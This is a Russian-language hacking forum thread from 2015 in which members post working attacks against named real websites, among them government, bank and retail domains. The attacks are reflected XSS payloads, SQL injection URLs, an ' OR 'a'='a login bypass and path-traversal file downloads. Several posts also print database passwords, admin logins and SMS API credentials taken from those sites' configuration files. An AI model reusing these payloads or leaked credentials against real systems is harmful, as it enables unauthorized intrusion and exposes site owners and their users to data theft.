Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. MDen1s

    MDen1s New Member

    Joined:
    12 Jul 2015
    Messages:
    17
    Likes Received:
    3
    Reputations:
    0
  2. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    target: http://dazo.gov.ua
    Type: XSS Reflected

    HTML:
    http://dazo.gov.ua/index.php?id="><iframe src='javascript:prompt(/XSS/)'>
     
    #142 DDShadoww, 14 Aug 2015
    Last edited: 14 Aug 2015
    joelblack likes this.
  3. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    target:https://dota2.net
    Type:XSS Reflected

    https://dota2.net/players/?st="><script>alert()</script>


    target:csgo.tm
    Type:XSS Reflected

    https://csgo.tm/support/

    Описание : Переходим по линке и там где надо писать сообщение в саппорт пишем наш скрипт,я пишу "><script>alert()</script>,дальше нажимаем создать тикет и вуаля(Нужно быть авторизованным в Steam . ) .
     
    DDShadoww likes this.
  4. hahanovB

    hahanovB Active Member

    Joined:
    22 Jul 2013
    Messages:
    264
    Likes Received:
    244
    Reputations:
    2
    #144 hahanovB, 16 Aug 2015
    Last edited: 16 Aug 2015
  5. private_static

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    76
    Reputations:
    22
    Error Based SQL inject
    Code:
    http://hentai-x.ru/anime.php?id=3%20AND%20%28SELECT%201%20FROM%28SELECT%20COUNT%28*%29,CONCAT%28%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29,0x20%29%29,1,50%29%29,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29lol%29
    srv40129_ignilx@localhost
     
    SaNDER likes this.
  6. hahanovB

    hahanovB Active Member

    Joined:
    22 Jul 2013
    Messages:
    264
    Likes Received:
    244
    Reputations:
    2
    Type: Arbitrary File Download

    Target: avalon-school.co.uk
    Vulnerable: http://avalon-school.co.uk/forcedownload.php?file=../wp-config.php
    PHP:
    define('DB_NAME''avalon_school');

    /** MySQL database username */
    define('DB_USER''avalon-school');

    /** MySQL database password */
    define('DB_PASSWORD''WEB4374dnfjv');

    /** MySQL hostname */
    define('DB_HOST''localhost');
    Target: trackcars4hire.co.uk
    Vulnerable: http://avalon-school.co.uk/forcedow.../../home/trackcars4hire/public_html/index.php

    Target: tankers-r-us.co.uk
    Vulnerable: http://avalon-school.co.uk/forcedow...../../home/tankers-r-us/public_html/index.php

    Target: brighterchoices.co.uk
    Vulnerable: http://avalon-school.co.uk/forcedow...../home/brighterchoices/public_html/index.php

    Target: theknutsfordspa.co.uk
    Vulnerable: http://avalon-school.co.uk/forcedow...../home/theknutsfordspa/public_html/index.php

    Target: rhinoequipment.com.au
    Vulnerable: http://avalon-school.co.uk/forcedow.../../home/rhinoequipment/public_html/index.php

    Target: korusgroup.co.uk
    Vulnerable: http://avalon-school.co.uk/forcedownload.php?file=../../../../home/korusgroup/public_html/index.php

    Target: dentalacademy.co.uk
    Vulnerable: http://avalon-school.co.uk/forcedow.../../home/dentalacademy/public_html/index.html
     
  7. Pe4aJlb

    Pe4aJlb Member

    Joined:
    16 Aug 2015
    Messages:
    20
    Likes Received:
    22
    Reputations:
    20
    Code:
    http://forum.antichat.ru/#<img src=1 onerror=alert(document.domain)>
    Яндекс тИЦ 400 pr 5
     
    #147 Pe4aJlb, 18 Aug 2015
    Last edited: 18 Aug 2015
    Filipp, -=charon=-, vkhacker and 11 others like this.
  8. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    244
    Likes Received:
    450
    Reputations:
    145
    target: http://www.kt.kz
    type: XSS Reflected
    Code:
    http://www.kt.kz/rus/search/?text=%22%3E%3Cscript%3Ealert%28%27Hello%27%29%3C%2Fscript%3E


    target: http://www.yerkramas.org/advancedsearch
    type: XSS Reflected

    title:
    Code:
    "><script>alert('Hello')</script>
    target: http://www.inet.az
    type: XSS Reflected
    Строка поиска:
    Code:
    "><script>alert('Hello')</script>
    target: http://www.yenixeber.com
    type: XSS Reflected
    Строка поиска:
    Code:
    "><script>alert('Hello')</script>
    target: https://stat.internet.su/
    type: SQL Injection

    Имя пользователя,Пароль:
    Code:
    ' OR 'a'='a

     
    #148 joelblack, 19 Aug 2015
    Last edited: 19 Aug 2015
  9. w0rm_

    w0rm_ Banned

    Joined:
    19 Aug 2015
    Messages:
    11
    Likes Received:
    24
    Reputations:
    8
    [колор=рэд][сайз=млн]ЯНДЕКС ТИЦ 100500 !!!![/колор][/сайз]
    Code:
    _ttps://drive.google.com/file/d/0B0ox2xf_0TMjWVNHRWlBTU9sSWs/view
     
    SaNDER, Take_IT and hahanovB like this.
  10. hahanovB

    hahanovB Active Member

    Joined:
    22 Jul 2013
    Messages:
    264
    Likes Received:
    244
    Reputations:
    2
    Type: Arbitrary File Download
    Target: 14isppgconvention.com
    Vulnerable: http://www.14isppgconvention.com/forcedownload.php?file=

    1. http://www.14isppgconvention.com/forcedownload.php?file=admin/index.php (GET)
    Получаем:
    PHP:
    if($_SERVER['REQUEST_METHOD']=='POST'){
    if(
    $_POST['username']=='14isppg' && $_POST['password']=='14isppg@admin'){
        
    $_SESSION['user']=1;
        
    header('Location:home.php');
        exit;
    Логин: 14isppg
    Пароль: 14isppg@admin

    2. Входим http://www.14isppgconvention.com/admin/
    Получаем: http://www.14isppgconvention.com/admin/users.php?export=users

    3. http://www.14isppgconvention.com/forcedownload.php?file=admin/users.php (GET)
    Находим:
    PHP:
    mysql_connect("peterjacob82.powwebmysql.com""14isppg""14isppgS20") or die(mysql_error());

    mysql_select_db("14isppg") or die(mysql_error())
    Находим:
    PHP:
        $FOO_USERNAME"39ispnc";
        
    $FOO_PASSWORD"n0f5qkqjba";
        
    $FOO_SENDERID"ISPPGM";
        
    $FOO_PRIORITY"11";

    $urltopost "http://bulksms.smslite.co.in/xmlapi.php";
     
    comstream likes this.
  11. hahanovB

    hahanovB Active Member

    Joined:
    22 Jul 2013
    Messages:
    264
    Likes Received:
    244
    Reputations:
    2
  12. hahanovB

    hahanovB Active Member

    Joined:
    22 Jul 2013
    Messages:
    264
    Likes Received:
    244
    Reputations:
    2
    Type: Arbitrary File Download
    Target: requisur.com
    Vulnerable: www.requisur.com/pdf/forcedownload.php?file=../configuration.php

    PHP:
    var $dbtype 'mysqli';
        var 
    $host 'localhost';
        var 
    $user 'gtbaotmh_requisu';
        var 
    $db 'gtbaotmh_requisu';
        var 
    $dbprefix 'kxlo_';
            var 
    $password 'Ry&f#4d*4$0vYk';
     
    yarbabin likes this.
  13. hahanovB

    hahanovB Active Member

    Joined:
    22 Jul 2013
    Messages:
    264
    Likes Received:
    244
    Reputations:
    2
    #153 hahanovB, 22 Aug 2015
    Last edited: 22 Aug 2015
  14. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    target:ykt.ru
    Type:XSS-Reflected
    Заходим сюда по линке
    ykt.ru/search/image?q=&t=0&s=0&sid=14&ws=6941337<a>%22%27&we=
    В поиске вводим "><script>alert("WX")</script>
    И видим XSS .
     
    yarbabin likes this.
  15. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
  16. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    244
    Likes Received:
    450
    Reputations:
    145
    target: http://www.globexbank.ru/
    type: XSS Reflected

    Курс обмена валют:
    Code:
    "><script>alert('Hello')</script>
     
    DDShadoww and SaNDER like this.
  17. hahanovB

    hahanovB Active Member

    Joined:
    22 Jul 2013
    Messages:
    264
    Likes Received:
    244
    Reputations:
    2
    Type: SQL Injection
    Target:
    intergips.com.ua
    Vulnerable:
    Code:
    http://intergips.com.ua/index.php?item_id=-3445%27%20UNION%20ALL%20SELECT%20CONCAT%280x717a787a71%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x71786b7171%29--%20
     
  18. w0rm_

    w0rm_ Banned

    Joined:
    19 Aug 2015
    Messages:
    11
    Likes Received:
    24
    Reputations:
    8
    Type: SQL Injection
    Target: *.mystart.com (212 alexa rang)

    PoC:
    Code:
    _ttp://apps2.mystart.com/ui/site/index.php?tb=vmndtxtb&cid=-2+union+select+1,user(),3,4+from+mysql.user+--
    File_priv=Y
    
     
    SaNDER likes this.
  19. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    _________________________
    BigBear likes this.
  20. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Target:http://www.ecco-shoes.ru/search
    Type:XSS-Reflected
    Описание: Переходим в любой раздел "Для мужчин/женщин" . Ищем поиск по артиклу и вбиваем в оба поля .

    Code:
    "><script>alert('Hello')</script> . 
    а также
    Code:
    www.ecco-shoes.ru/shops/?country=UNION SELECT 1,2,3,'<script>alert('SIXSS')</script>',5,6 --&region=Архангельская+область&town=Архангельск


    Да и вообще на этом сайте много XSS .
     
    #160 SaNDER, 29 Aug 2015
    Last edited: 29 Aug 2015
Loading...
Similar Threads - Уязвимости SQLi
  1. zase
    Replies:
    1
    Views:
    3,543
  2. Shadows_God
    Replies:
    14
    Views:
    8,051